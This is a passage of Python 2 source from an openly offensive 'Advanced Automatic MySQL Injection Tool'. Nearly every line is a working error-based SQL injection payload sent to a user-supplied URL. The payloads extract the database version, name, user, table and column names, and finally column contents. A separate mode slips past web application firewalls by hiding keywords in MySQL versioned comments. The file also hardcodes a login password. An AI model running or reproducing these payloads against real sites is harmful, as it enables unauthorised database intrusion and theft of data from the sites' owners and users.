- wfpr40 = re.findall("XPATH syntax error: ':(.*)'",wfxur40)
- wfxur41 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!%s*/+/*!from*/+%s+limit+0,1)),0x3a)--+' % ( wfur, wfxpdt2, wfxpcol)).read()
- wfpr41 = re.findall("XPATH syntax error: ':(.*)'",wfxur41)
- wfxur42 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!%s*/+/*!from*/+%s+limit+0,1)),0x3a)--+' % ( wfur, wfxpdt3, wfxpcol)).read()
- wfpr42 = re.findall("XPATH syntax error: ':(.*)'",wfxur42)
- wfxur43 = urllib2.urlopen('%s+and+updatexml(0x3a,concat/*!(0x3a,(/*!50000select*/+/*!%s*/+/*!from*/+%s+limit+0,1)),0x3a)--+' % ( wfur, wfxpdt4, wfxpcol)).read()
- wfpr43 = re.findall("XPATH syntax error: ':(.*)'",wfxur43)
- print "\n\nFirst Column Result : "
- print wfpr39
- print "\nSecond Column Result : "
- print wfpr40
- print "\nThird Column Result : "
- print wfpr41
- print "\nFourth Column Result : "
- print wfpr42
- print "\nFifth Column Result : "
- print wfpr43
- print "\n\n All Processes Done!\n Turning Off All Functions!"
- time.sleep(1)
- print "Press Enter To Exit.."
- def duplicate_simple():
- time.sleep(.6)
- print "Enter Injection URL : For Example 'http://www.example.com/page.php?id=4'\n"
- print "\nIf the Injection Doesn't Work. Try For String Based \n(Add ' in the end of the URL)\nOr Try WAF Bypassed Version.\nOr Try Any other Method\n"
- ur = raw_input("Enter URL : ")
- print "\n Started Injecting\n Please Wait .. \n"
- xur = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+concat(cast(version()+as+char),+0x22203a3a20,0x7e))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
- pr = re.findall("Duplicate entry '(.*)~",xur,re.MULTILINE)
- xur1 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+concat(cast(database()+as+char),+0x22203a3a20,0x7e))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
- pr1 = re.findall("Duplicate entry '(.*)~",xur1,re.MULTILINE)
- xur2 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+concat(cast(user()+as+char),+0x22203a3a20,0x7e))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
- pr2 = re.findall("Duplicate entry '(.*)~",xur2,re.MULTILINE)
- xur3 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
- pr3 = re.findall("Duplicate entry '(.*)~",xur3)
- xur4 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+1,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
- pr4 = re.findall("Duplicate entry '(.*)~",xur4)
- xur5 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+2,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
- pr5 = re.findall("Duplicate entry '(.*)~",xur5)
- xur6 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+3,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
- pr6 = re.findall("Duplicate entry '(.*)~",xur6)
- xur7 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+4,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
- pr7 = re.findall("Duplicate entry '(.*)~",xur7)
- xur8 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+5,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
- pr8 = re.findall("Duplicate entry '(.*)~",xur8)
- xur9 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+6,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
- pr9 = re.findall("Duplicate entry '(.*)~",xur9)
- xur10 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+7,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
- pr10 = re.findall("Duplicate entry '(.*)~",xur10)
- xur11 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+8,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
- pr11 = re.findall("Duplicate entry '(.*)~",xur11)
- xur12 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+9,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
- pr12 = re.findall("Duplicate entry '(.*)~",xur12)
- xur13 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+10,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
- pr13 = re.findall("Duplicate entry '(.*)~",xur13)
- xur14 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+11,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
- pr14 = re.findall("Duplicate entry '(.*)~",xur14)
- xur15 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+12,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
- pr15 = re.findall("Duplicate entry '(.*)~",xur15)
- xur16 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+13,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
- pr16 = re.findall("Duplicate entry '(.*)~",xur16)
- xur17 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+14,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
- pr17 = re.findall("Duplicate entry '(.*)~",xur17)
- xur18 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+15,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
- pr18 = re.findall("Duplicate entry '(.*)~",xur18)
- xur19 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+16,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
- pr19 = re.findall("Duplicate entry '(.*)~",xur19)
- xur20 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+17,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
- pr20 = re.findall("Duplicate entry '(.*)~",xur20)
- xur21 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+18,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
- pr21 = re.findall("Duplicate entry '(.*)~",xur21)
- xur22 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+19,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
- pr22 = re.findall("Duplicate entry '(.*)~",xur22)
- xur23 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=database()+limit+20,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ur).read()
- pr23 = re.findall("Duplicate entry '(.*)~",xur23)
- print "\nDatabase Version : "
- print pr
- print "\nDatabase Name : "
- print pr1
- print "\nDatabase User : "
- print pr2
- print "\nTables :"
- print pr3
- print pr4
- print pr5
- print pr6
- print pr7
- print pr8
- print pr9
- print pr10
- print pr11
- print pr12
- print pr13
- print pr14
- print pr15
- print pr16
- print pr17
- print pr18
- print pr19
- print pr20
- print pr21
- print pr22
- print pr23
- print "\n\n"
- xpcol = raw_input("Enter The Name Of Table to Grab Columns :")
- xpcol1 = xpcol.encode("hex")
- xur24 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=database()+AND+table_name=0x%s+limit+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpcol1)).read()
- pr24 = re.findall("Duplicate entry '(.*)~",xur24)
- xur25 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=database()+AND+table_name=0x%s+limit+1,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpcol1)).read()
- pr25 = re.findall("Duplicate entry '(.*)~",xur25)
- xur26 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=database()+AND+table_name=0x%s+limit+2,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpcol1)).read()
- pr26 = re.findall("Duplicate entry '(.*)~",xur26)
- xur27 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=database()+AND+table_name=0x%s+limit+3,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpcol1)).read()
- pr27 = re.findall("Duplicate entry '(.*)~",xur27)
- xur28 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=database()+AND+table_name=0x%s+limit+4,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpcol1)).read()
- pr28 = re.findall("Duplicate entry '(.*)~",xur28)
- xur29 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=database()+AND+table_name=0x%s+limit+5,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpcol1)).read()
- pr29 = re.findall("Duplicate entry '(.*)~",xur29)
- xur30 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=database()+AND+table_name=0x%s+limit+6,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpcol1)).read()
- pr30 = re.findall("Duplicate entry '(.*)~",xur30)
- xur31 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=database()+AND+table_name=0x%s+limit+7,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpcol1)).read()
- pr31 = re.findall("Duplicate entry '(.*)~",xur31)
- xur32 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=database()+AND+table_name=0x%s+limit+8,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpcol1)).read()
- pr32 = re.findall("Duplicate entry '(.*)~",xur32)
- xur33 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=database()+AND+table_name=0x%s+limit+9,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpcol1)).read()
- pr33 = re.findall("Duplicate entry '(.*)~",xur33)
- xur34 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=database()+AND+table_name=0x%s+limit+10,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpcol1)).read()
- pr34 = re.findall("Duplicate entry '(.*)~",xur34)
- xur35 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=database()+AND+table_name=0x%s+limit+11,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpcol1)).read()
- pr35 = re.findall("Duplicate entry '(.*)~",xur35)
- xur36 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=database()+AND+table_name=0x%s+limit+12,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpcol1)).read()
- pr36 = re.findall("Duplicate entry '(.*)~",xur36)
- xur37 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=database()+AND+table_name=0x%s+limit+13,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpcol1)).read()
- pr37 = re.findall("Duplicate entry '(.*)~",xur37)
- xur38 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=database()+AND+table_name=0x%s+limit+14,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpcol1)).read()
- pr38 = re.findall("Duplicate entry '(.*)~",xur38)
- print "\nColumns : "
- print pr24
- print pr25
- print pr26
- print pr27
- print pr28
- print pr29
- print pr30
- print pr31
- print pr32
- print pr33
- print pr34
- print pr35
- print pr36
- print pr37
- print pr38
- print "\n Note : If you don't want any column just leave it empty :)\n"
- xpdt = raw_input("Enter First Column Name : ")
- xpdt1 = raw_input("Enter Second Column Name : ")
- xpdt2 = raw_input("Enter Third Column Name : ")
- xpdt3 = raw_input("Enter Fourth Column Name : ")
- xpdt4 = raw_input("Enter Fifth Column Name : ")
- xur39 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,cast(%s+as+char),+0x27,0x7e))+from+%s+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpdt, xpcol)).read()
- pr39 = re.findall("Duplicate entry '(.*)~",xur39)
- xur40 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,cast(%s+as+char),+0x27,0x7e))+from+%s+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpdt1, xpcol)).read()
- pr40 = re.findall("Duplicate entry '(.*)~",xur40)
- xur41 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,cast(%s+as+char),+0x27,0x7e))+from+%s+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpdt2, xpcol)).read()
- pr41 = re.findall("Duplicate entry '(.*)~",xur41)
- xur42 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,cast(%s+as+char),+0x27,0x7e))+from+%s+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpdt3, xpcol)).read()
- pr42 = re.findall("Duplicate entry '(.*)~",xur42)
- xur43 = urllib2.urlopen('%s+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,cast(%s+as+char),+0x27,0x7e))+from+%s+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1--+' % ( ur, xpdt4, xpcol)).read()
- pr43 = re.findall("Duplicate entry '(.*)~",xur43)
- print "\n\nFirst Column Result : "
- print pr39
- print "\nSecond Column Result : "
- print pr40
- print "\nThird Column Result : "
- print pr41
- print "\nFourth Column Result : "
- print pr42
- print "\nFifth Column Result : "
- print pr43
- print "\n\n All Processes Done!\n Turning Off All Functions!"
- time.sleep(1)
- print "Press Enter To Exit.."
- def acc():
- time.sleep(1)
- print "\n\n -- Access Granted! "
- time.sleep(.9)
- print "\n -- lulZ! \n "
- time.sleep(.9)
- def cred():
- os.system("cls")
- time.sleep(1)
- os.system("title - Advanced Automatic MySQL Injection Tool :: Coded By James ::")
- usx = 'admin'
- psx = 'adminxxxx'
- print "\n ### Please Login To Continue ###\n" + "-"*55
- pol = raw_input(" Enter Your Username : ")
- pol1 = raw_input(" Enter Your Password : ")
- if(pol != usx):
- print "Username is Incorrect!"
- time.sleep(1)
- sys.exit(0)
- if(pol1 != psx):
- print "Password is Incorrect!"
- time.sleep(1)
- sys.exit(0)
- acc()
- def duplicate_waf():
- time.sleep(.6)
- print "Enter Injection URL : For Example 'http://www.example.com/page.php?id=4'\n"
- print "\nIf the Injection Doesn't Work. Try For String Based \n(Add ' in the end of the URL)\nOr Try WAF Bypassed Version.\nOr Try Any other Method\n"
- ur = raw_input("Enter URL : ")
- print "\n Started Injecting\n Please Wait .. \n"
- time.sleep(2.5)
- print " WAF Killed The Injection Process !!\n Bypassing This Shit!\n"
- xur = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+concat/*!(0x7e,0x27,/*!00000cast(version()+as+char),+0x27,0x7e))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
- pr = re.findall("Duplicate entry '(.*)~",xur,re.MULTILINE)
- xur1 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+concat/*!(0x7e,0x27,/*!00000cast(database()+as+char),+0x27,0x7e))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
- pr1 = re.findall("Duplicate entry '(.*)~",xur1,re.MULTILINE)
- xur2 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+concat/*!(0x7e,0x27,/*!00000cast(user()+as+char),+0x27,0x7e))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
- pr2 = re.findall("Duplicate entry '(.*)~",xur2,re.MULTILINE)
- xur3 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+LIMIT+0,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
- pr3 = re.findall("Duplicate entry '(.*)~",xur3)
- xur4 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+1,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
- pr4 = re.findall("Duplicate entry '(.*)~",xur4)
- xur5 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+2,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
- pr5 = re.findall("Duplicate entry '(.*)~",xur5)
- xur6 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+3,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
- pr6 = re.findall("Duplicate entry '(.*)~",xur6)
- xur7 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+4,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
- pr7 = re.findall("Duplicate entry '(.*)~",xur7)
- xur8 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+5,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
- pr8 = re.findall("Duplicate entry '(.*)~",xur8)
- xur9 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+6,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
- pr9 = re.findall("Duplicate entry '(.*)~",xur9)
- xur10 = urllib2.urlopen('%s+and(/*!00000select*/+1+/*!00000from*/(/*!00000select*/+count(*),concat/*!((/*!00000select*/+(/*!00000select*/+(/*!00000SELECT*/+distinct+concat/*!(0x7e,0x27,/*!00000cast(/*!00000table_name*/+as+char),0x27,0x7e)+/*!00000FROM*/+/*!00000information_schema*/./**/tables+/*!00000where*/+/*!00000table_schema*/=/*!00000database()*/+limit+7,1))+/*!00000from*/+/*!00000information_schema*/./**/tables+limit+0,1),floor(rand(0)*2))x+/*!00000from*/+/*!00000information_schema*/./**/tables+group+by+x)a)+/*!00000and+1=1*/--+' % ur).read()
- pr10 = re.findall("Duplicate entry '(.*)~",xur10)
